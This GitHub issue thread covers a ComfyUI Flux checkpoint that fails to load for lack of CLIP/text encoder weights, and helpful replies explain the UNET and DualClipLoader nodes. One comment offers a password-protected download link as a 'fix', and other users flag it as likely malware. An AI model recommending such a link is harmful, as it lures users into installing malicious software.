### ISSUE TITLE
load flux checkpoint error

### ISSUE THREAD

**Issue by sguibianqude** [comfyanonymous/ComfyUI#4624]
### Your question

Error occurred when loading flux checkpoint,no CLIP/text encoder weights in checkpoint, the text encoder model will not be loaded.

### Logs

```powershell
no CLIP/text encoder weights in checkpoint, the text encoder model will not be loaded.
!!! Exception during processing !!! 'NoneType' object has no attribute 'tokenize'
Traceback (most recent call last):
  File "I:\AI\comfyui\ComfyUI_windows_portable_nvidia\ComfyUI_windows_portable\ComfyUI\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\AI\comfyui\ComfyUI_windows_portable_nvidia\ComfyUI_windows_portable\ComfyUI\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\AI\comfyui\ComfyUI_windows_portable_nvidia\ComfyUI_windows_portable\ComfyUI\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "I:\AI\comfyui\ComfyUI_windows_portable_nvidia\ComfyUI_windows_portable\ComfyUI\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "I:\AI\comfyui\ComfyUI_windows_portable_nvidia\ComfyUI_windows_portable\ComfyUI\nodes.py", line 64, in encode
    tokens = clip.tokenize(text)
             ^^^^^^^^^^^^^
AttributeError: 'NoneType' object has no attribute 'tokenize'
```

**Comment by sguibianqude** [comment]
checkpoint is https://civitai.com/models/656083/copycat-flux-testfp8fp16

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JorgeR81** [comment]
> >  to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

> Sorry, I would like to ask how to use this fix or where it should be placed

@sguibianqude. STOP ! I think that's malware !

**Comment by sguibianqude** [comment]
> > > to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."
> 
> > Sorry, I would like to ask how to use this fix or where it should be placed
> 
> @sguibianqude. STOP ! I think that's malware !
> 
> See this issue: #4616

  really？ my be i should delete it first

**Comment by JorgeR81** [comment]
These smaller models ( ~ 11GB ), don't have  
The larger ones ( ~22 GB ) also don't have weights (  but they are in PF16 format, instead of FP8 ).

For them, you use the UNET loader.

https://comfyanonymous.github.io/ComfyUI_examples/flux/

![unet](https://github.com/user-attachments/assets/28f99366-322b-46cb-a6b0-28ea3ae1c1a2)


---

Only the ones with 15 GB ~ 17 GB are checkpoint versions and include CLIP/text encoder weights ( they are all in FP8 ).

**Comment by sguibianqude** [comment]
> 这些较小的模型 （ ~ 11 GB ） 没有 CLIP/文本编码器权重。较大的 （ ~ 22 GB ） 也没有 CLIP/文本编码器权重 （ 但它们是 FP16 格式，而不是 FP8 ）。
> 
> 对于他们，您可以使用 UNET 加载程序。
> 
> https://comfyanonymous.github.io/ComfyUI_examples/flux/
> 
> ![unet](https://private-user-images.githubusercontent.com/72734038/361731201-28f99366-322b-46cb-a6b0-28ea3ae1c1a2.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NTAwMDcsIm5iZiI6MTcyNDc0OTcwNywicGF0aCI6Ii83MjczNDAzOC8zNjE3MzEyMDEtMjhmOTkzNjYtMzIyYi00NmNiLWE2YjAtMjhlYTNhZTFjMWEyLmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDA5MDgyN1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTYwZWFhYjBmOTdlNDRkOGI3MTJhYTJmYmY2YTQxMGI3MTU0NmQ3YmJlY2QxOGViYzBiZmNhYzkyMTNmYTIzMzImWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.gAyXECXjQHEHFqQmX3q9kOYu4wUBYJYabBGexE6ZP7E)
> 
> 只有 15 GB ~ 17 GB 的版本是检查点版本，并且包括 CLIP/文本编码器权重（它们都在 FP8 中）。

Useful！ thank you very much

**Comment by sguibianqude** [comment]
> > > 要解决您的问题，请尝试下载此修复程序，我在另一个问题中看到它，https://app.mediafire.com/3ag3jpquii3of 密码：更改我在安装时，您需要检查安装到路径并选择“GCC”。
> 
> > 抱歉，我想询问如何使用此修复程序或应该将其放置在哪里
> 
> 。停！我认为那是恶意软件！
> 
> 查看此问题：#4616

![image](https://github.com/user-attachments/assets/d1bff4da-5a6e-4a4a-bad5-3b64e299223f)
Can you delete this reply that may contain malicious software? I cannot delete it

**Comment by ZeroCool22** [comment]
> These smaller models ( ~ 11 GB ), don't have CLIP/text encoder weights. The larger ones ( ~ 22 GB ) also don't have CLIP/text encoder weights ( but they are in FP16 format, instead of FP8 ).
> 
> For them, you use the UNET loader.
> 
> https://comfyanonymous.github.io/ComfyUI_examples/flux/
> 
> ![unet](https://private-user-images.githubusercontent.com/72734038/361731201-28f99366-322b-46cb-a6b0-28ea3ae1c1a2.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjcxNzEwMzIsIm5iZiI6MTcyNzE3MDczMiwicGF0aCI6Ii83MjczNDAzOC8zNjE3MzEyMDEtMjhmOTkzNjYtMzIyYi00NmNiLWE2YjAtMjhlYTNhZTFjMWEyLmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA5MjQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwOTI0VDA5Mzg1MlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWM5M2UxNDY1NjZhNWYxYzYxMWI2OTNkNDljZDFhYTY2MGZlYTcxY2I0YjYwMTZjM2VkYmFkNTliMzBlNzEwNWQmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.N_TP4kJQ9pcCsRl8acTDnDiRneKq0Q4jMeWV_6JeYZw)
> 
> Only the ones with 15 GB ~ 17 GB are checkpoint versions and include CLIP/text encoder weights ( they are all in FP8 ).

And what about the CLIP and VAE?

![Screenshot_50](https://github.com/user-attachments/assets/41d180f6-61d6-471d-8119-0dae98d56c96)

**Comment by JorgeR81** [comment]
Use the `DualClipLoader` node.

You can use the default one, but the GGUF one, also works.
